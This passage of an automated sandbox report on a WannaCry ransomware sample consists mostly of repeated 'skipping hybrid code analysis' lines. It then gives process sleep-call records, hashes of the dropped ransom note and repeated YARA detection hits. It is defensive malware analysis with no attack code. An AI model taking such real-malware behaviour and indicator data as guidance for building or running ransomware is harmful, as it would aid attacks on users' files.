                                                                                      • Skipping hybrid code analysis for target 151 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 152 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 153 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 154 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 155 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 156 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 157 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 158 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 159 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 16 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 160 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 161 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 162 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 163 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 164 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 165 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 166 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 167 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 168 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 169 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 17 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 170 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 171 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 172 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 173 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 174 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 175 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 176 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 177 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 178 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 179 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 18 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 180 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 181 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 182 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 183 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 184 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 185 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 186 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 187 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 188 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 189 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 19 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 190 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 191 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 192 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 193 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 194 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 195 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 196 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 197 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 198 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 199 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 20 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 200 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 201 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 202 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 203 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 204 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 205 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 206 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 207 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 208 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 209 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 21 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 210 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 211 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 212 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 22 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 23 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 24 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 25 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 26 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 27 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 28 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 29 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 30 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 31 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 32 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 33 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 34 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 35 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 36 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 37 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 38 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 39 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 40 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 41 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 42 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 43 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 44 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 45 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 46 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 47 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 48 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 49 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 5 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 50 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 51 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 52 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 53 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 54 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 55 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 56 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 57 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 58 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 59 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 60 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 61 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 62 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 63 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 64 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 65 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 66 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 67 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 68 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 69 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 70 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 72 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 73 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 74 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 75 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 77 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 78 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 79 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 80 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 82 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 83 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 84 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 85 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 86 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 87 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 88 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 89 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 90 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 92 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 93 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 94 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 95 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 96 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 97 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 98 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      • Skipping hybrid code analysis for target 99 due to data oversize (total size is 10495 MB, which is larger than the maximum total file size of 4000 MB (see MAXSCAEOVERALLMEMDUMPSIZEINMB)
                                                                                      TimeTypeDescription
                                                                                      15:47:49API Interceptor14524563x Sleep call for process: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe modified
                                                                                      15:47:50API Interceptor1x Sleep call for process: dllhost.exe modified
                                                                                      15:47:59API Interceptor2x Sleep call for process: @WanaDecryptor@.exe modified
                                                                                      15:48:00API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                      No context
                                                                                      No context
                                                                                      No context
                                                                                      No context
                                                                                      No context
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):933
                                                                                      Entropy (8bit):4.711824502619554
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                                                      MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                                                      SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                                                      SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                                                      SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      • Rule: WannaCry_RansomNote, Description: Detects WannaCry Ransomware Note, Source: C:\Users\user\AppData\Local\@Please_Read_Me@.txt, Author: Florian Roth
                                                                                      Reputation:low
